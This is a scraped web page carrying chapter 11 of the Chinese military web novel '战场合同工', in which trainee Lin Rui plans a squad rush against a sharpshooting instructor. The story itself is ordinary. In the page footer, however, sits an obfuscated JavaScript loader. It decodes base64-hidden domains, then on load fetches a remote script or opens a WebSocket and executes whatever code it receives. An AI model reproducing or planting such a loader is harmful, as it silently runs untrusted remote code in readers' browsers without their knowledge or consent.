笔趣阁

字:
关灯 护眼
笔趣阁 > 战场合同工 > 第十一章 火力封锁

第十一章 火力封锁

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    林锐所在的小队,除了他之外还有秦奋、金浩山和其他三个人。
  
      在赵建飞用橡皮子弹完虐了四支小队之后,接下来就轮到他们了。赵建飞吐掉了嘴角的烟卷,又重新叼上了一支。面对这些完全不是对手的菜鸟学员,他似乎有些放松,也有些意兴萧索。
  
      “第五小队上。我说,你们这帮人难道没有人能够冲破这五十米的距离么?哪怕冲出来二十米也行啊,无聊得我都快睡着了。”赵建飞懒洋洋地伸着懒腰,但是他的眼睛却从没有从他们几个人身上离开。
  
      林锐和其余几个小队成员隐伏在训练场的遮蔽物后面,等待着机会。
  
      “我们分头突进,现在我们有六个人,他总不可能把我们全放倒吧。即便是再快的枪手,用步枪点射也有一个间歇时间。”金浩山压低声音道。
  
      “不,赵建飞的枪法非常好。即便我们同时冲出去,他也能够在瞬间调整。在这种情况下,我们冲不出十米距离,就会有人中弹。而每一次有人中弹,就会降低我们其他人的机会。因为下一次,他要瞄准的目标就减少了。我们根本没有机会接近到二十米距离。”林锐冷静地道。
  
      “那怎么办?就这样被他压制着?训练可是有时间限制的。”秦奋低声道。
  
      “都听我的,我们不能同时跑。而应该在彼此行动的时间上有一秒到两秒的间歇。而且不能贪功,看到那面的这小土坡了没有。那里是他的射击死角。只要冲到那里,就立刻卧倒,采用低姿匍匐,或许能够多向前推进五到六米的距离。”林锐的眼睛瞄向了一侧的一个小土坡。
  
      他伸出了手,然后一点一点倒数。其余小队成员都对他点了一下头。等林锐的一只手最终捏成一个拳头的时候,他第一个动了。他从遮蔽物之后冲了出来,然后快速卧倒,一个翻滚。他的动作突然而迅捷,就像一只蓄势而动的猎豹。
  
      赵建飞的枪响了,子弹几乎就擦着林锐的头盔掠过。就在赵建飞开枪的同时,其余几个人也都开始向前运动。这一次林锐的战术成功了,他用自己的主动现身,来赢得了大概一秒的时间。让其余人在赵建飞的枪口之下顺利逃生了。
  
      这也是赵建飞第一次射击,却没有击中目标。他抽了一口烟,冷笑道,“你还真是****运。”
  
      伏在土坡后面的林锐调整了一下呼吸,大声回答道,“这可不是什么****运,而是对时机地形的把握和合理运用。再说,你这么做也不够公平。我们手无寸铁,没法阻止起火力支援和掩护策应,完全是被你压着打而已。敢不敢给我们每人一支枪,我们保证压得你抬不起头来。”
  
      “完全是屁话,战场上鬼来和你讲公平?要的就是不公平!”赵建飞嘲讽道,“老子教你们战术的目的就是,让你们学会怎利用一切有利的地形条件和有利时机,来争取到对敌人的不公平。兔崽子们,该露出你们的脑袋了,难道你们想在那个土坡后面待一辈子?”
  
      林锐微微有些皱眉,他们现在躲避的这个土坡,最多只有七十公分左右的高度。只能是匍匐着,要从这里出去,冲向下一个遮蔽物,需要一定的速度。而这种匍匐着的姿势是最难在瞬间达到一定速度的,因为没法发力。
  
      就像是短跑运动员,要想快速起跑总是采用蹲踞式的起跑方式。因为这种姿势保持了人体重心的略微前倾,并且可以把力量聚集到双腿上,以便于蹬腿起跑。但是现在这样趴在地上,即便是要爬起来都需要时间,起跑更慢。赵建飞的枪可一点都不慢。林锐知道他们现在之所以安全,主要是因为匍匐在赵建飞的射击死角,即便是稍微一抬头,就能被他一枪撂倒。
  
      这种情况之下该怎么快速通过这里,并且闪避进下一个遮蔽物?林锐一阵头痛。
  
      “怎么了?不敢动了么?”赵建飞嘲笑道。“出来吧,混蛋。还有那个猪头,被吓破胆了吧,老子都听得到你尿裤子的声音了。不如举起手,排队出来。老子不虐待俘虏。”他所称的猪头是指秦奋,自从上次秦奋被白熊修理了之后,他就一直以这个来称呼秦奋。
  
      秦奋苦着脸对林锐道,“兄弟,我们现在该怎么办?完全被他压制住了,根本不会抬头了。”
  
      林锐想了想咬牙道,“老样子,我先冲出去,吸引他的注意。你们向两侧相反的方向运动。这样一来,我们一支小队六个人将会潜伏在三处不同的遮蔽物后面。他要想同时对付我们,有难度。”
  
      金浩山压低声音道,“可现在怎么冲?该死了赵疯子一定在前面端着枪瞄准,只要一爬起来就会被他放倒的。”
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x57\x69\x77\x51\x4b\x69\x58\x4b\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNoZGtmamxhcy56aGl4aWFuZ2h1aWJhbby5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《战场合同工》
打开
浏览器
继续